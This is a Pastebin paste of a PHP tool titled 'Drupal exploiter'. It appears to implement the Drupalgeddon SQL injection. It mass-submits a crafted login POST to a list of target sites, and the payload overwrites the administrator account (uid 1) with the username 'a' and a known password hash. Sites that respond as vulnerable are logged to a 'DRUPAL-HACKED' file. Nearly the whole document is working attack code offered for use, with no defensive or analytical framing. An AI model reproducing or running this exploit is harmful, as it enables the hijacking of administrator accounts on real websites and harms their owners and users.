Advertisement
Guest User

Untitled

a guest
Oct 27th, 2016
230
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.34 KB | None | 0 0
  1.  
  2.  
  3.  
  4.  
  5. <b>.:: Drupal exploiter || ::.</b><br>
  6. <b>.::https://www.facebook.com/profile.php?id=100010370566606::.</b>
  7. <?php
  8. echo'<form method="POST" action="">
  9. <textarea name="urls" cols="50" rows="16" placeholder="Put The Website To Inject ^_^ ex : http://wwww.site.com" ></textarea><br>
  10. <input type="submit" name="submit" value="submit">
  11. </form>
  12. ';
  13. $urls = $_POST['urls'];
  14. $sites = explode("\r\n",$urls);
  15. foreach($sites as $url){
  16. $url =trim($url);
  17.  
  18. $file = fopen("DRUPAL-HACKED.txt", "a");
  19. error_reporting(0);
  20. if (isset($_POST['submit'])) {
  21. //$url = $_POST['url'];
  22. $post_data = "name[0;update users set name %3D 'a' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  23. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  24. ", 'content' => $post_data));
  25. $ctx = stream_context_create($params);
  26. $data = file_get_contents($url . '/user/login/', null, $ctx);
  27. echo "<h4>Scanning at \"/user/login/</h4>\"";
  28. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  29. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  30. echo "Success! User:a Pass:admin at {$url}/user/login <br>";
  31. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  32. echo "<br>---------------------------------------------------------------------------------------<br>";
  33. fwrite($fp, "Succes! User:a Pass:admin -> {$url}/user/login");
  34. fwrite($fp, "
  35. ");
  36. fwrite($fp, "======================================##ZeDan~El~King##==========================================================");
  37. fwrite($fp, "
  38. ");
  39. fclose($fp);
  40. } else {
  41. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  42. }
  43. }
  44. if (isset($_POST['submit'])) {
  45. //$url = "http://" . $_GET['url'] . "/";
  46. $post_data = "name[0;update users set name %3D 'a' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  47. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  48. ", 'content' => $post_data));
  49. $ctx = stream_context_create($params);
  50. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  51. echo "<h4>Scanning at \"Index</h4>\"";
  52. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  53. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  54. echo "Success! User:a Pass:admin at {$url}/user/login <br>";
  55. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  56. echo "<br>======================================================================================<br>";
  57. fwrite($fp, "Success! User:a Pass:admin -> {$url}/user/login");
  58. fwrite($fp, "
  59. ");
  60. fwrite($fp, "##ZeDan~El~King##");
  61. fwrite($fp, "
  62. ");
  63. fclose($fp);
  64. } else {
  65. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  66. echo "<br>======================================================================================<br>";
  67. }
  68. }
  69. //==========
  70. }// end foreach
  71.  
  72.  
  73. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement